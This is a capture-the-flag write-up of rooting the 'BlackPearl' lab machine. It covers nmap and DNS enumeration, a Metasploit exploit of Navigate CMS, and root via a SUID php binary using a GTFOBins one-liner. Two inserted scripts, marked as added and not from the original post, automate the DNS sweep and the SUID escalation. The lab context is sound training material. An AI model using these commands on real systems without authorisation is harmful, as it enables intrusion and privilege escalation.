Conquering BlackPearl

Sarthak, published in CodeX. 5 min read, Sep 7, 2023.

Introduction

Hey folks! I recently hacked the "BlackPearl" machine, and it was a good refresher for my hacking skills. I will be honest with you all: I am not doing much hacking nowadays, because I am stepping into the world of Cloud and DevOps, so I have not been able to hack much. It had been a long time since I got hands-on, so I thought, why not? I did it and it felt great; the thrill of solving these machines never gets old for me. Let us dive right in.

BlackPearl

First, let us launch the BlackPearl and Kali Linux machines. BlackPearl will look like this when booted.

Once your Kali (or any other Linux) machine has booted, let us become root and then carry on with our investigation of this machine, so go ahead and run this command:

sudo su

Then note your machine's IP address by running:

ifconfig

Now we will run a ping sweep so that we can see which machines are up on our network.

nmap -sn 10.0.2.0/24

Our target machine is at 10.0.2.10. Let us run nmap against this IP to gather more information about the system.

nmap -A -T4 -v -Pn -p- 10.0.2.10 >> blackpearl.txt&

This runs nmap in the background so that you can listen to the Pirates of the Caribbean theme song while it works (-A enables OS and version detection, script scanning and traceroute; -p- scans all 65535 TCP ports; -Pn skips host discovery, which the ping sweep already did). After the job completes, you can view the results by opening the file.

From this output we can see three open ports, 22, 53 and 80, running SSH, DNS and HTTP respectively. Let us start with the service on port 80. Browsing to the IP shows a plain default nginx page.

Both the nmap scan and Wappalyzer report nginx version 1.14.2, so let us look for exploits for this version. There are some known vulnerabilities, but none that look usable against a default install, so let us move on to directory brute-forcing to look for hidden directories on the server. This found the directory /secret:

gobuster dir -u http://10.0.2.10/ -w /opt/SecLists/Discovery/Web-Content/common.txt

So yeah, we got trolled; nothing less was expected from Captain Jack Sparrow. Directory brute-forcing against the bare IP is a dead end, and so is the HTTP service for now. Moving on to the DNS service. First, a reverse lookup with dig, sending the query to the target's own nameserver (without the @10.0.2.10, dig would ask our own resolver, which knows nothing about the target's zones):

dig -x 10.0.2.10 @10.0.2.10

Another dead end with dig: there is no PTR record for 10.0.2.10. Let us try dnsrecon this time, sweeping the loopback range 127.0.0.0/24 in reverse against the target's nameserver:

dnsrecon -r 127.0.0.0/24 -n 10.0.2.10

Some luck at last: the target's reverse zone for the loopback range gives up a hostname. Let us add this hostname to our /etc/hosts file, pointing it at 10.0.2.10 (not at the loopback address the PTR record returned), and see what we were missing on the HTTP service.
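The reverse-DNS sweep and the hosts-file mapping above as one script. This is an added example for this writeup, not code from the original post; it assumes the target nameserver is 10.0.2.10 and that dig (from bind9-dnsutils) is installed on the attacking machine, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original post: reverse-DNS sweep against the
# target's own nameserver, then /etc/hosts entries that point the discovered
# names at the target rather than at the address the PTR record returns.

NS=10.0.2.10   # assumption: the BlackPearl box, which also serves DNS

# PTR lookup of one address via the target resolver. Prints the name or nothing.
# A plain "dig -x 10.0.2.10" would ask Kali's default resolver instead;
# "@$NS" sends the query to the box.
ptr_lookup() {
    dig +short +time=2 +tries=1 -x "$1" "@$NS" 2>/dev/null
}

# Sweep a /24 given its first three octets, printing "ip name." per hit.
# The loopback range is worth trying because a lab box often carries a
# reverse zone for its own 127.0.0.0/24, which is what dnsrecon found here.
sweep_ptr() {
    prefix=$1
    i=0
    while [ "$i" -le 255 ]; do
        name=$(ptr_lookup "$prefix.$i")
        if [ -n "$name" ]; then
            printf '%s %s\n' "$prefix.$i" "$name"
        fi
        i=$((i + 1))
    done
}

# Read "ip name." lines on stdin (sweep_ptr output) and emit /etc/hosts lines
# mapping each name to the target. The trailing dot is stripped, since PTR
# answers are fully qualified but /etc/hosts names are not.
hosts_entries() {
    while read -r ip name; do
        [ -n "$name" ] || continue
        printf '%s %s\n' "$NS" "${name%.}"
    done
}

# Usage (as root, to append to the hosts file):
#   sweep_ptr 127.0.0 | hosts_entries | tee -a /etc/hosts
```

The point of the last function is the one that trips people up: the PTR record says 127.0.0.1, but the name must resolve to 10.0.2.10 on the attacking machine, otherwise the browser will happily connect to Kali's own loopback interface.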

After browsing to blackpearl.tcm we see that PHP is running on the server.

Let us run the directory brute force again, this time against the domain name. I am using a different tool here, since it is recursive by default.

Brute-forcing turned up this URL:

http://blackpearl.tcm/navigate/login.php

It looks like some kind of CMS; let us investigate further. Wappalyzer reported:

Investigating the page source reveals the version of the CMS in use (Navigate CMS):

Now we can look for an exploit for this version. Aaah, finally some promising stuff: let us launch msfconsole and exploit Captain Jack Sparrow's ship.

msfconsole
use multi/http/navigate_cms_rce
set rhosts http://blackpearl.tcm
exploit

Exploit!!

Apologies for the arbitrary characters there; I scrolled in the terminal by mistake. Hehe. Let's get a shell on the machine from the meterpreter session:

shell

Let us spawn an interactive shell; the commands for that are in this repo:

https://github.com/Sarthak044/Hackpy_101

Now for privilege escalation. First, search for files or directories with the SUID bit set that we might be able to exploit; after SUID, try the sudo technique (sudo -l) to see whether the user is allowed to run anything as root.

We found these files with the SUID bit set via the command (searching from / rather than the current directory, and silencing permission-denied errors):

find / -perm /4000 -type f 2>/dev/null

The most interesting of them all is PHP. How, you may ask? Call it gut feeling: after solving enough boxes you start to recognise these things. You could probably exploit some of the others too, but PHP is the least complex and most straightforward. Over to GTFOBins, which lists php as exploitable when it has the SUID bit set:

/usr/bin/php7.3 -r 'pcntl_exec("/bin/sh", ["-p"]);'
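The post-exploitation chain above (stabilising the shell, enumerating SUID binaries, triaging them, checking sudo, then abusing SUID php) as one script. This is an added example and not code from the original post or the linked repo; the list of "known escalators" is my own illustrative subset of what GTFOBins documents, the function names are assumptions, and the php path defaults to the /usr/bin/php7.3 found on this box.

```shell
#!/bin/sh
# Added example, not from the original post: post-exploitation helpers for the
# low-privilege shell, from TTY upgrade through SUID triage to the php escalation.

# Upgrade the dumb reverse shell to a TTY using whichever helper exists on the
# box. Afterwards, on the attacker side, "stty raw -echo; fg" gives working
# tab completion and Ctrl-C.
upgrade_shell() {
    if command -v python3 >/dev/null 2>&1; then
        python3 -c 'import pty; pty.spawn("/bin/bash")'
    elif command -v python >/dev/null 2>&1; then
        python -c 'import pty; pty.spawn("/bin/bash")'
    elif command -v script >/dev/null 2>&1; then
        script -qc /bin/bash /dev/null
    else
        echo "no pty helper found" >&2
        return 1
    fi
}

# Every regular file with the setuid bit set. stderr is dropped to hide the
# permission-denied noise from /proc and other users' home directories.
list_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# The "sudo technique": list what this user may run as root, without prompting
# for a password (-n) so the shell does not hang if one is required.
check_sudo() {
    sudo -n -l 2>/dev/null
}

# Assumption: an illustrative subset of binaries GTFOBins documents as abusable
# when SUID, not an exhaustive list. Matching is on the basename; a trailing
# version string (php7.3, python3) is accepted by the second case pattern.
KNOWN_SUID_ESCALATORS="php find vim nano python perl bash env cp mv less more awk nmap"

# Read paths on stdin and print the ones worth a GTFOBins lookup.
# Usage: list_suid | triage_suid
triage_suid() {
    while IFS= read -r path; do
        name=${path##*/}
        for known in $KNOWN_SUID_ESCALATORS; do
            case $name in
                "$known"|"$known"[0-9]*)   # exact name, or versioned like php7.3
                    printf '%s\n' "$path"
                    break
                    ;;
            esac
        done
    done
}

# The GTFOBins SUID technique for php: pcntl_exec replaces the php process with
# /bin/sh while the effective UID stays root, and "-p" stops sh from dropping it
# back to the real UID. Needs php's pcntl extension. Confirm with "id", which
# should show euid=0(root).
escalate_via_php() {
    php=${1:-/usr/bin/php7.3}
    "$php" -r 'pcntl_exec("/bin/sh", ["-p"]);'
}
```

Triage is the part worth automating: a SUID list on a stock Debian box is mostly passwd, sudo, mount and friends, and filtering it against a list of binaries GTFOBins already covers gets you to the interesting entry (here php7.3) without reading every line by hand.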

And done.

Sorry Captain Jack Sparrow, but yet again your precious black pearl is taken.
